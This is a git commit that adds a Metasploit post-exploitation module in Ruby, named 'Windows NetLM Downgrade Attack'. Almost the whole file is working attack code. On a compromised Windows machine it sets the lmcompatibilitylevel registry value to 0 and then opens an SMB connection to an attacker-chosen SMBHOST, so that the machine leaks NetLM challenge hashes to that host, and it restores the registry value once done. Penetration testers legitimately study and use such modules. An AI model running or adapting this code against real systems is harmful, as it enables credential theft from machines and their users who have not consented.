added post exploit netlm_downgrade.rb

unstable
Brandon McCann 2012-11-28 22:01:47 -06:00
parent e7a565b474
commit 84fc320c30
1 changed files with 79 additions and 0 deletions

View File

@ -0,0 +1,79 @@
##
# $Id: netlm_downgrade.rb
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/registry'
require 'msf/core/post/windows/services'
require 'msf/core/post/common'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Registry
include Msf::Post::Windows::WindowsServices
include Msf::Post::Common
def initialize(info={})
super(update_info(info,
'Name' => 'Windows NetLM Downgrade Attack',
'Description' => %q{ This module will change a registry value to enable
the sending of LM challange hashes and then initiate a SMB connection to
the SMBHOST datastore. If an SMB server is listening, it will receive the
NetLM hashes
},
'License' => MSF_LICENSE,
'Author' => [ 'Brandon McCann "zeknox" <bmccann [at] accuvant.com>', 'Thomas McCarthy "smilingraccoon" <smilingraccoon [at] gmail.com>'],
'SessionTypes' => [ 'meterpreter' ],
'References' => [
[ 'URL', 'http://www.fishnetsecurity.com/6labs/blog/post-exploitation-using-netntlm-downgrade-attacks']
]
))
register_options(
[
OptString.new( 'SMBHOST', [ true, 'IP Address where SMB host is listening to capture hashes.' ])
], self.class)
end
# method to make smb connection
def smb_connect
print_status("Establishing SMB connection to " + datastore['SMBHOST'])
cmd_exec("cmd.exe","/c net use * \\\\#{datastore['SMBHOST']}\\ipc$")
print_status("The SMBHOST should now have NetLM hashes")
end
# if netlm is disabled, enable it in the registry
def run
subkey = "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\"
v_name = "lmcompatibilitylevel"
netlm = registry_getvaldata(subkey, v_name)
if netlm == 0
print_status("NetLM is already enabled on this system")
# call smb_connect method to pass network hashes
smb_connect
else
print_status("NetLM is Disabled: #{subkey}#{v_name} == #{netlm.to_s}")
registry_setvaldata(subkey,v_name,0,"REG_DWORD")
post_netlm = registry_getvaldata(subkey, v_name)
print_good("NetLM is Enabled: #{subkey}#{v_name} == #{post_netlm.to_s}")
# call smb_connect method to pass network hashes
smb_connect
# cleanup the registry
registry_setvaldata(subkey,v_name,netlm,"REG_DWORD")
print_status("Cleanup Completed: #{subkey}#{v_name} == #{netlm.to_s}")
end
end
end